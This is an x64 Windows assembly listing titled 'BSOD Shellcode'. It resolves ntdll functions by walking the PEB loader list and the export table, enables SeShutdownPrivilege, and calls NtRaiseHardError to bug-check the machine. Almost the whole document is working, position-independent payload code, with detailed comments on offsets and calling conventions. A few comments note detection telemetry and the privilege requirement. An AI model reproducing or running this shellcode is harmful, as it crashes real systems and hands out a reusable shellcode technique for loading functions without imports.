BSOD Shellcode
# Assembler: GAS with Intel operand order. Target: Windows x64 (Microsoft x64
# ABI: integer args in rcx, rdx, r8, r9, then the stack; the caller owes
# 32 bytes of shadow space before every call).
# What this listing does: it resolves two ntdll exports by walking the PEB
# loader list and ntdll's export directory (no imports, so the blob is
# position-independent), enables SeShutdownPrivilege, and then calls
# NtRaiseHardError asking for a system-shutdown response, which bug-checks
# the machine.
# Reader note: the PEB walk plus by-name export matching below is the
# textbook shellcode "API resolution" pattern that hunting rules key on, and
# the resulting calls still enter ntdll, so call telemetry on
# RtlAdjustPrivilege / NtRaiseHardError observes them.
.intel_syntax noprefix
.global main
.text
#-----------------------------------------------------------------------
# int main(void)
# ABI:   Microsoft x64 (program entry point)
# Phase 1 walks PEB -> Ldr -> second in-memory-order module -> export
#         directory and leaves the table pointers in r10/rdx/r8/r9 (below).
# Phase 2 scans every exported name against the two literals at `strings`
#         and records the matching indices in r12 / r13.
# Phase 3 calls RtlAdjustPrivilege and then NtRaiseHardError through the
#         resolved pointers.
# Clobb: r12-r14 (callee-saved) are overwritten and never restored -- tolerable
#        for an entry point, not for an ordinary function.
# Defender note: the crash depends on SeShutdownPrivilege being present in
#        the caller's token; for an account without that right (Local
#        Security Policy, "Shut down the system") the privilege cannot be
#        enabled and the hard-error call is expected to be rejected rather
#        than bug-check.
#-----------------------------------------------------------------------
main:
# After setup:
# r10 = DLL base
# rax = number of names in the export table
# rdx = ordinals
# r8 = function names
# r9 = function addresses
mov r10, gs:[0x60] # gs:0x60 = TEB.ProcessEnvironmentBlock -> PEB
mov r10, [r10 + 0x18] # PEB->Ldr
mov r10, [r10 + 0x20] # Ldr->InMemoryOrderModuleList.Flink (first entry = the executable itself)
mov r10, [r10] # Flink->Flink: second entry, normally ntdll.dll
mov r10, [r10 + 0x20] # LDR_DATA_TABLE_ENTRY.DllBase; the list links sit at +0x10 in the entry, so every field offset is shifted by -0x10
mov ecx, [r10 + 0x3c] # IMAGE_DOS_HEADER.e_lfanew: RVA of the PE header
lea rdx, [r10 + rcx + 0x18] # Optional header = PE header + 4-byte signature + 20-byte file header
mov ecx, [rdx + 0x70] # DataDirectory[0].VirtualAddress: RVA of the export directory
add rcx, r10 # rcx = IMAGE_EXPORT_DIRECTORY
mov edx, [rcx + 0x24] # AddressOfNameOrdinals RVA
add rdx, r10 # rdx = ordinal table (u16 entries)
mov r8d, [rcx + 0x20] # AddressOfNames RVA
add r8, r10 # r8 = name-RVA table (u32 entries)
mov r9d, [rcx + 0x1c] # AddressOfFunctions RVA
add r9, r10 # r9 = function-RVA table (u32 entries)
mov eax, [rcx + 0x18] # NumberOfNames (the author's "number of exports"): length of the name table
sub eax, 1 # rax = last name index; the loop walks it down to 0
# Scan loop invariant: rax = current name index, r11 = pointer to that name.
# Both helpers return rax == 0 on match and clobber rax, hence the push/pop
# around them; r14 carries the index because the helpers preserve r12-r14.
.loop_start:
mov r11d, [r8 + (rax * 4)] # RVA of the rax-th exported name
add r11, r10 # r11 = &name[0]
mov r14, rax # index copy that survives the helper calls
push rax
call strcmp_nt # rax = 0 iff the name starts with "NtRaiseHardError"
test rax, rax
cmove r12, r14 # r12 = index of NtRaiseHardError (written only on a match)
call strcmp_rtl # rax = 0 iff the name starts with "RtlAdjustPrivilege"
test rax, rax
cmove r13, r14 # r13 = index of RtlAdjustPrivilege (written only on a match)
pop rax
dec rax
jns .loop_start # continue while index >= 0
# at this point r12 = index of NtRaiseHardError, r13 = index of RtlAdjustPrivilege
# read the ordinals (16-bit loads: only the low word of r12/r13 is replaced)
mov r12w, [rdx + (2 * r12)]
mov r13w, [rdx + (2 * r13)]
# read function pointers (function table is indexed by ordinal, not by name index)
mov r12d, [r9 + (4 * r12)]
add r12, r10 # r12 = NtRaiseHardError
mov r13d, [r9 + (4 * r13)]
add r13, r10 # r13 = RtlAdjustPrivilege
# now the real fun begins :P
sub rsp, 56 # 32-byte shadow space + two stack args (16) + 8 pad; entry rsp%16==8, so rsp is 16-aligned at both calls
mov rcx, 19 # Privilege = SE_SHUTDOWN_PRIVILEGE (19)
mov rdx, 1 # Enable = TRUE
xor r8d, r8d # CurrentThread = FALSE -> operate on the process token
lea r9, [rsp + 64] # Enabled (out BOOLEAN) -> first slot of the caller's shadow space, just above main's return address
call r13 # RtlAdjustPrivilege(19, TRUE, FALSE, &prev); succeeds only if the token already holds the privilege
lea rax, [rsp + 72] # scratch slot for the Response out-parameter (second caller shadow slot)
mov ecx, 0xC00002B4 # ErrorStatus: the NTSTATUS displayed by the bug check (looks like STATUS_FLOAT_MULTIPLE_FAULTS -- verify against ntstatus.h)
xor edx, edx # NumberOfParameters = 0
xor r8d, r8d # UnicodeStringParameterMask = 0
xor r9d, r9d # Parameters = NULL
mov QWORD PTR [rsp + 32], 6 # 5th arg (first stack slot above the shadow space): ValidResponseOptions = OptionShutdownSystem (6)
mov QWORD PTR [rsp + 40], rax # 6th arg: Response = &scratch
call r12 # NtRaiseHardError(...): with the privilege enabled this bug-checks the system
add rsp, 56
xor eax, eax # reached only if NtRaiseHardError returned (e.g. the privilege could not be enabled): exit status 0
ret
#-----------------------------------------------------------------------
# strcmp_rtl -- fixed-length prefix compare against "RtlAdjustPrivilege"
# In:    r11 = pointer to a candidate export name (NUL-terminated)
# Out:   rax = 0 if the first 18 bytes at r11 equal the literal, else 1
# Clobb: rax, flags. r12-r14 are used as scratch but saved/restored because
#        main keeps live values in them across this call.
# Note:  this is not a real strcmp: exactly 18 bytes are compared and the
#        terminator is never checked, so any name that merely begins with
#        the literal also matches. A shorter name stops the loop at its NUL
#        because NUL never equals a byte of the literal.
# Note:  `.nomatch` below is also the mismatch exit of strcmp_nt, which
#        jumps into this function relying on the identical push order.
#-----------------------------------------------------------------------
strcmp_rtl:
push r12
push r13
push r14
mov r12, 0 # r12 = byte index i
.strcmp_loop_start:
movzx r13, BYTE PTR [r11 + r12] # r13 = name[i]
lea r14, [rip + strings] # RIP-relative: no relocation, keeps the blob position-independent
add r14, r12
movzx r14, BYTE PTR [r14] # r14 = "RtlAdjustPrivilege"[i]
cmp r13, r14
jne .nomatch
inc r12
cmp r12, 18 # strlen("RtlAdjustPrivilege") == 18
jne .strcmp_loop_start
# strcmp_loop_end: all 18 bytes matched, fall through into .match
.match: # label is not referenced anywhere; kept for readability only
pop r14
pop r13
pop r12
xor eax, eax # return 0 = match
ret
.nomatch: # shared exit (see header); pops mirror the three pushes at entry
pop r14
pop r13
pop r12
mov rax, 1 # return 1 = no match
ret
#-----------------------------------------------------------------------
# strcmp_nt -- fixed-length prefix compare against "NtRaiseHardError"
# In:    r11 = pointer to a candidate export name (NUL-terminated)
# Out:   rax = 0 if the first 16 bytes at r11 equal the literal, else 1
# Clobb: rax, flags. r12-r14 are saved/restored for the same reason as in
#        strcmp_rtl (main keeps live values in them).
# Note:  same prefix-only semantics as strcmp_rtl: 16 bytes are compared
#        and the terminator is never checked.
# Note:  the mismatch path has no exit of its own -- it jumps to `.nomatch`
#        inside strcmp_rtl, so this function only works while strcmp_rtl
#        stays in the file with the same push order.
#-----------------------------------------------------------------------
strcmp_nt:
push r12
push r13
push r14
mov r12, 0 # r12 = byte index i
.strcmp_loop_start_nt:
movzx r13, BYTE PTR [r11 + r12] # r13 = name[i]
lea r14, [rip + strings + 18] # literal starts 18 bytes in, right after "RtlAdjustPrivilege"
add r14, r12
movzx r14, BYTE PTR [r14] # r14 = "NtRaiseHardError"[i]
cmp r13, r14
jne .nomatch # mismatch exit lives in strcmp_rtl
inc r12
cmp r12, 16 # strlen("NtRaiseHardError") == 16
jne .strcmp_loop_start_nt
# strcmp_loop_end: all 16 bytes matched
pop r14
pop r13
pop r12
xor eax, eax # return 0 = match
ret
# Concatenated literals read by the two compare helpers: bytes 0-17 are
# "RtlAdjustPrivilege", bytes 18-33 are "NtRaiseHardError". There are no NUL
# terminators or separators -- the helpers compare fixed lengths. The data
# stays in .text (no section switch) so the RIP-relative loads keep the blob
# in one contiguous span; it is only ever read, never written.
strings:
.ascii "RtlAdjustPrivilegeNtRaiseHardError"